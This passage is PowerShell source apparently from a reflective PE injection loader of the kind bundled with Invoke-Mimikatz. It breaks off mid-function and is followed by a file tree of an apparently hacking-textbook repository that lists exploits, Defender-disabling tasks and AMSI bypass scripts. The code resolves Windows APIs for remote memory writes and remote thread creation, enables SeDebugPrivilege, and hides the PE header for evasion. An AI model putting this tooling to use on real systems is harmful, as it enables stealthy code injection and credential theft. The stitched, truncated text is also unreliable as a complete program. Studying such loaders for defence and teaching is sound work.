$Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary
$GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
$GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
$GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress
$GetProcAddressOrdinalAddr = Get-ProcAddress kernel32.dll GetProcAddress
$GetProcAddressOrdinalDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])
$GetProcAddressOrdinal = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressOrdinalAddr, $GetProcAddressOrdinalDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressOrdinal -Value $GetProcAddressOrdinal
$VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
$VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])
$VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
$Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree
$VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx
$VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])
$VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)
$Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx
$VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect
$VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])
$VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)
$Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect
$GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
$GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
$GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
$Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
$FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
$FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
$FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
$OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
$OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
$OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess
$WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
$WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])
$WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject
$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
$WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
$WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory
$ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory
$ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
$ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory
$CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
$CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
$CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread
$GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread
$GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])
$GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread
$OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken
$OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])
$OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken
$GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread
$GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])
$GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread
$AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
$AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])
$AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges
$LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA
$LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])
$LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue
$ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf
$ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])
$ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf
# NtCreateThreadEx is only ever called on Vista and Win7. NtCreateThreadEx is not exported by ntdll.dll in Windows XP
if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) {
$NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
$NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
$NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
}
$IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process
$IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
$IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process
$CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread
$CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])
$CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread
$LocalFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
$LocalFreeDelegate = Get-DelegateType @([IntPtr])
$LocalFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LocalFreeAddr, $LocalFreeDelegate)
$Win32Functions | Add-Member NoteProperty -Name LocalFree -Value $LocalFree
return $Win32Functions
}
#####################################
#####################################
########### HELPERS ############
#####################################
#Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function
#This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses
Function Sub-SignedIntAsUnsigned
{
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Int64]
$Value1,
[Parameter(Position = 1, Mandatory = $true)]
[Int64]
$Value2
)
[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
if ($Value1Bytes.Count -eq $Value2Bytes.Count)
{
$CarryOver = 0
for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
{
$Val = $Value1Bytes[$i] - $CarryOver
#Sub bytes
if ($Val -lt $Value2Bytes[$i])
{
$Val += 256
$CarryOver = 1
}
else
{
$CarryOver = 0
}
[UInt16]$Sum = $Val - $Value2Bytes[$i]
$FinalBytes[$i] = $Sum -band 0x00FF
}
}
else
{
Throw "Cannot subtract bytearrays of different sizes"
}
return [BitConverter]::ToInt64($FinalBytes, 0)
}
Function Add-SignedIntAsUnsigned
{
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Int64]
$Value1,
[Parameter(Position = 1, Mandatory = $true)]
[Int64]
$Value2
)
[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
if ($Value1Bytes.Count -eq $Value2Bytes.Count)
{
$CarryOver = 0
for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
{
#Add bytes
[UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver
$FinalBytes[$i] = $Sum -band 0x00FF
if (($Sum -band 0xFF00) -eq 0x100)
{
$CarryOver = 1
}
else
{
$CarryOver = 0
}
}
}
else
{
Throw "Cannot add bytearrays of different sizes"
}
return [BitConverter]::ToInt64($FinalBytes, 0)
}
Function Compare-Val1GreaterThanVal2AsUInt
{
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Int64]
$Value1,
[Parameter(Position = 1, Mandatory = $true)]
[Int64]
$Value2
)
[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
if ($Value1Bytes.Count -eq $Value2Bytes.Count)
{
for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)
{
if ($Value1Bytes[$i] -gt $Value2Bytes[$i])
{
return $true
}
elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])
{
return $false
}
}
}
else
{
Throw "Cannot compare byte arrays of different size"
}
return $false
}
Function Convert-UIntToInt
{
Param(
[Parameter(Position = 0, Mandatory = $true)]
[UInt64]
$Value
)
[Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)
return ([BitConverter]::ToInt64($ValueBytes, 0))
}
Function Test-MemoryRangeValid
{
Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
$DebugString,
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$PEInfo,
[Parameter(Position = 2, Mandatory = $true)]
[IntPtr]
$StartAddress,
[Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
[IntPtr]
$Size
)
[IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
$PEEndAddress = $PEInfo.EndAddress
if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)
{
Throw "Trying to write to memory smaller than allocated address range. $DebugString"
}
if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)
{
Throw "Trying to write to memory greater than allocated address range. $DebugString"
}
}
Function Write-BytesToMemory
{
Param(
[Parameter(Position=0, Mandatory = $true)]
[Byte[]]
$Bytes,
[Parameter(Position=1, Mandatory = $true)]
[IntPtr]
$MemoryAddress
)
for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)
{
[System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])
}
}
#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/
Function Get-DelegateType
{
Param
(
[OutputType([Type])]
[Parameter( Position = 0)]
[Type[]]
$Parameters = (New-Object Type[](0)),
[Parameter( Position = 1 )]
[Type]
$ReturnType = [Void]
)
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
$TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
$ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
$MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
$MethodBuilder.SetImplementationFlags('Runtime, Managed')
Write-Output $TypeBuilder.CreateType()
}
#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/
Function Get-ProcAddress
{
Param
(
[OutputType([IntPtr])]
[Parameter( Position = 0, Mandatory = $True )]
[String]
$Module,
[Parameter( Position = 1, Mandatory = $True )]
[String]
$Procedure
)
# Get a reference to System.dll in the GAC
$SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
# this fixes VirtualAlloc issues on Windows 10 Build 1903
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
$HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
# Return the address of the function
Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
}
Function Enable-SeDebugPrivilege
{
Param(
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Types,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Constants
)
[IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()
if ($ThreadHandle -eq [IntPtr]::Zero)
{
Throw "Unable to get the handle to the current thread"
}
[IntPtr]$ThreadToken = [IntPtr]::Zero
[Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
if ($Result -eq $false)
{
$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)
{
$Result = $Win32Functions.ImpersonateSelf.Invoke(3)
if ($Result -eq $false)
{
Throw "Unable to impersonate self"
}
$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
if ($Result -eq $false)
{
Throw "Unable to OpenThreadToken."
}
}
else
{
Throw "Unable to OpenThreadToken. Error code: $ErrorCode"
}
}
[IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
$Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid)
if ($Result -eq $false)
{
Throw "Unable to call LookupPrivilegeValue"
}
[UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
[IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)
$TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)
$TokenPrivileges.PrivilegeCount = 1
$TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)
$TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
[System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)
$Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)
$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value
if (($Result -eq $false) -or ($ErrorCode -ne 0))
{
#Throw "Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode" #todo need to detect if already set
}
[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
}
Function Invoke-CreateRemoteThread
{
Param(
[Parameter(Position = 1, Mandatory = $true)]
[IntPtr]
$ProcessHandle,
[Parameter(Position = 2, Mandatory = $true)]
[IntPtr]
$StartAddress,
[Parameter(Position = 3, Mandatory = $false)]
[IntPtr]
$ArgumentPtr = [IntPtr]::Zero,
[Parameter(Position = 4, Mandatory = $true)]
[System.Object]
$Win32Functions
)
[IntPtr]$RemoteThreadHandle = [IntPtr]::Zero
$OSVersion = [Environment]::OSVersion.Version
#Vista and Win7
if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))
{
Write-Verbose "Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress"
$RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
if ($RemoteThreadHandle -eq [IntPtr]::Zero)
{
Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError"
}
}
#XP/Win8
else
{
Write-Verbose "Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress"
$RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)
}
if ($RemoteThreadHandle -eq [IntPtr]::Zero)
{
Write-Verbose "Error creating remote thread, thread handle is null"
}
return $RemoteThreadHandle
}
Function Get-ImageNtHeaders
{
Param(
[Parameter(Position = 0, Mandatory = $true)]
[IntPtr]
$PEHandle,
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Types
)
$NtHeadersInfo = New-Object System.Object
#Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness
$dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)
#Get IMAGE_NT_HEADERS
[IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))
$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr
$imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)
#Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen.
if ($imageNtHeaders64.Signature -ne 0x00004550)
{
throw "Invalid IMAGE_NT_HEADER signature."
}
if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
{
$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64
$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true
}
else
{
$ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)
$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32
$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false
}
return $NtHeadersInfo
}
#This function will get the information needed to allocated space in memory for the PE
Function Get-PEBasicInfo
{
Param(
[Parameter(
gitextract_9jdookxc/
├── .gitignore
├── CloudSetup/
│ ├── README.md
│ ├── build-images.sh
│ ├── delete-old-images.sh
│ ├── delete-orphaned-snaps.sh
│ ├── deprovision.sh
│ ├── eksall.template
│ ├── find-orphaned-snaps.sh
│ ├── install-cloud-tools.sh
│ ├── kali-base/
│ │ ├── config.sh
│ │ └── kali.hcl
│ ├── provision.sh
│ ├── server-2016-base/
│ │ ├── bootstrap.ps1
│ │ ├── server2016_template.json
│ │ └── user_data.ps1
│ └── server-2019-base/
│ ├── bootstrap.ps1
│ ├── server2019_template.json
│ └── user_data.ps1
├── README.md
├── ch02/
│ ├── client.py
│ ├── fmt_str.c
│ ├── hello.asm
│ ├── hello.c
│ ├── ifelse.c
│ ├── meet.c
│ ├── memory.c
│ ├── targets
│ └── while_ex.c
├── ch03/
│ ├── heapme_demo.c
│ ├── hello.c
│ ├── leak-bof-exploit.py
│ └── leak-bof.c
├── ch04/
│ ├── students-patched.c
│ ├── students.c
│ └── students.csv
├── ch05/
│ ├── myAtoi
│ ├── myAtoi.c
│ ├── myProg
│ └── myProg.c
├── ch07/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch07_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── addshare.txt
│ │ │ │ │ │ ├── covenant.patch
│ │ │ │ │ │ └── shells/
│ │ │ │ │ │ ├── build_csharp.sh
│ │ │ │ │ │ ├── build_go.sh
│ │ │ │ │ │ ├── build_nim.sh
│ │ │ │ │ │ ├── csharp.template
│ │ │ │ │ │ ├── execute.template
│ │ │ │ │ │ ├── go.mod
│ │ │ │ │ │ ├── go.sum
│ │ │ │ │ │ ├── go.template
│ │ │ │ │ │ └── nim.template
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ └── usermods.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ └── README.md
├── ch08/
│ └── winlogbeat.yml
├── ch10/
│ ├── ch10_6
│ ├── ch10_6_exploit.py
│ ├── getenv.c
│ ├── meet.c
│ ├── meet_exploit.py
│ ├── overflow.c
│ ├── shellcode.c
│ ├── smallbuff.c
│ └── smallbuff_exploit.py
├── ch11/
│ ├── README.md
│ ├── exploit1.py
│ ├── exploit2.py
│ ├── exploit3-v2.py
│ ├── exploit3.py
│ ├── exploit4.py
│ ├── vuln
│ └── vuln.c
├── ch12/
│ ├── bzImage
│ ├── initramfs.cpio
│ ├── run1.sh
│ ├── run2.sh
│ ├── run3.sh
│ ├── run4.sh
│ ├── run5.sh
│ ├── shared/
│ │ ├── .ash_history
│ │ ├── exploit1/
│ │ │ └── exploit.c
│ │ ├── exploit2/
│ │ │ └── exploit.c
│ │ ├── exploit3/
│ │ │ └── exploit.c
│ │ ├── exploit4/
│ │ │ └── exploit.c
│ │ ├── exploit5/
│ │ │ └── exploit.c
│ │ └── leak.c
│ ├── stackprotector-disabled/
│ │ ├── bzImage
│ │ └── vmlinux
│ └── vmlinux
├── ch13/
│ ├── hello.c
│ ├── meet.c
│ ├── prosshd1.py
│ ├── prosshd2.py
│ ├── prosshd3.py
│ └── prosshd_dep.py
├── ch14/
│ ├── binaries/
│ │ └── DBUtil_2_3.Sys
│ ├── dbutil_exploit/
│ │ ├── Cargo.toml
│ │ └── src/
│ │ ├── bin/
│ │ │ ├── exploit.rs
│ │ │ └── ioctlcall.rs
│ │ └── lib.rs
│ ├── dbutil_exploit.c
│ ├── dbutil_exploit.py
│ └── ioctlcall.py
├── ch15/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch15_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── Invoke-Mimikatz.ps1
│ │ │ │ │ │ └── amsi.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── target_customizations/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
